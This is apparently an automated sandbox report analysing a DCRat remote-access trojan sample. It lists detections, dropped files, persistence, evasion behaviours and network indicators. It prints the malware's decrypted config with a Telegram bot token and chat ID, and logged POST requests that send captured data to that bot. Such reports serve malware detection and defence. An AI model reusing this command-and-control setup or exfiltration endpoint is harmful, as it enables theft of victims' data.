Windows Analysis Report
H9gMIu2HXi.exe

Overview

General Information

Sample name: H9gMIu2HXi.exe
renamed because original name is a hash value
Original sample name: 4fb1d8f8dff638f2c9b382f9552b18e2.bin.exe
Analysis ID: 1417539
MD5: 4fb1d8f8dff638f2c9b382f9552b18e2
SHA1: 5bc4dbad7914ceb72dba45d1b1efffba40143653
SHA256: b706a1a67f20b5e029c058de6a1e681a36fea762f69b9d983921d0e47ec2bc6c
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\BudDliLc.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\LdxTVLQK.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\MFrsFgjH.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Recovery\winlogon.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\vybNluDs.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Recovery\winlogon.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Virustotal: Detection: 58%
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\BudDliLc.log Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\LdxTVLQK.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\LdxTVLQK.log Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\MFrsFgjH.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\MFrsFgjH.log Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\RAtJMMZA.log Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\TDfrhvdw.log Virustotal: Detection: 9%
Source: C:\Users\user\Desktop\WslZMRrk.log Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\aEtIhTbg.log Virustotal: Detection: 9%
Source: C:\Users\user\Desktop\tRVOBpwv.log Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\tnEMlbYs.log Virustotal: Detection: 7%
Source: H9gMIu2HXi.exe Virustotal: Detection: 60%
Source: H9gMIu2HXi.exe ReversingLabs: Detection: 42%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\tRVOBpwv.log Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\tnEMlbYs.log Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aEtIhTbg.log Joe Sandbox ML: detected
Source: C:\Recovery\winlogon.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TDfrhvdw.log Joe Sandbox ML: detected
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6770966847","bottoken":"7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o","settings":" !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2","0","xworm","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: H9gMIu2HXi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: H9gMIu2HXi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00A2BA94
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A3D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 3_2_0031BA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 3_2_0032D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_0072A69B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_0073C220
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local

Networking

Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.79.128:80
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"Host: api.telegram.orgContent-Length: 98588Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipinfo.io
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: unknown HTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"Host: api.telegram.orgContent-Length: 98588Expect: 100-continueConnection: Keep-Alive
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000033D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000379A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.00000000029C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr String found in binary or memory: https://api.telegram.org/bot
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhotoX
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003349000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr String found in binary or memory: https://ipinfo.io/country
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr String found in binary or memory: https://ipinfo.io/ip
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.cs Long String: Length: 157876
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.cs Long String: Length: 157876
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00A27AAF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A292C6 0_2_00A292C6
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A35011 0_2_00A35011
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A462A8 0_2_00A462A8
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A35282 0_2_00A35282
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A302F7 0_2_00A302F7
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A38253 0_2_00A38253
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A313FD 0_2_00A313FD
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A464D7 0_2_00A464D7
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3742E 0_2_00A3742E
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A355B0 0_2_00A355B0
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A4E600 0_2_00A4E600
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A307A7 0_2_00A307A7
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A388AF 0_2_00A388AF
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2D833 0_2_00A2D833
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2395A 0_2_00A2395A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A4EAAE 0_2_00A4EAAE
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A24A8E 0_2_00A24A8E
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A52BB4 0_2_00A52BB4
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2FCCC 0_2_00A2FCCC
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A37DDC 0_2_00A37DDC
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A22EB6 0_2_00A22EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003192C6 3_2_003192C6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00325011 3_2_00325011
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00328253 3_2_00328253
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003362A8 3_2_003362A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00325282 3_2_00325282
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003202F7 3_2_003202F7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003213FD 3_2_003213FD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032742E 3_2_0032742E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003364D7 3_2_003364D7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003255B0 3_2_003255B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0033E600 3_2_0033E600
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003207A7 3_2_003207A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031D833 3_2_0031D833
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003288AF 3_2_003288AF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031395A 3_2_0031395A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0033EAAE 3_2_0033EAAE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00314A8E 3_2_00314A8E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00342BB4 3_2_00342BB4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031FCCC 3_2_0031FCCC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00332D40 3_2_00332D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00327DDC 3_2_00327DDC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00312EB6 3_2_00312EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072848E 4_2_0072848E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007240FE 4_2_007240FE
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007300B7 4_2_007300B7
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00734088 4_2_00734088
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00737153 4_2_00737153
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007451C9 4_2_007451C9
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007232F7 4_2_007232F7
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007362CA 4_2_007362CA
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007343BF 4_2_007343BF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072F461 4_2_0072F461
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0074D440 4_2_0074D440
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072C426 4_2_0072C426
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007377EF 4_2_007377EF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072286B 4_2_0072286B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0074D8EE 4_2_0074D8EE
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007519F4 4_2_007519F4
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072E9B7 4_2_0072E9B7
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00736CDC 4_2_00736CDC
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00733E0B 4_2_00733E0B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072EFE2 4_2_0072EFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00744F9A 4_2_00744F9A
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8028 8_2_00007FFD9BAB8028
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BABC425 8_2_00007FFD9BABC425
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BABC350 8_2_00007FFD9BABC350
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8E70 8_2_00007FFD9BAB8E70
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB1222 8_2_00007FFD9BAB1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8E7F 8_2_00007FFD9BAB8E7F
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAC48EE 8_2_00007FFD9BAC48EE
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC2E842 8_2_00007FFD9BC2E842
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC2DA96 8_2_00007FFD9BC2DA96
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC3111B 8_2_00007FFD9BC3111B
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Code function: 14_2_00007FFD9BA91222 14_2_00007FFD9BA91222
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Code function: 15_2_00007FFD9BAC1222 15_2_00007FFD9BAC1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 32_2_00007FFD9BAB1222 32_2_00007FFD9BAB1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 33_2_00007FFD9BAB1222 33_2_00007FFD9BAB1222
Source: C:\Recovery\winlogon.exe Code function: 34_2_00007FFD9BAB1222 34_2_00007FFD9BAB1222
Source: C:\Recovery\winlogon.exe Code function: 35_2_00007FFD9BAB1222 35_2_00007FFD9BAB1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 40_2_00007FFD9BAB1222 40_2_00007FFD9BAB1222
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Code function: 42_2_00007FFD9BAD1222 42_2_00007FFD9BAD1222
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8028 43_2_00007FFD9BAC8028
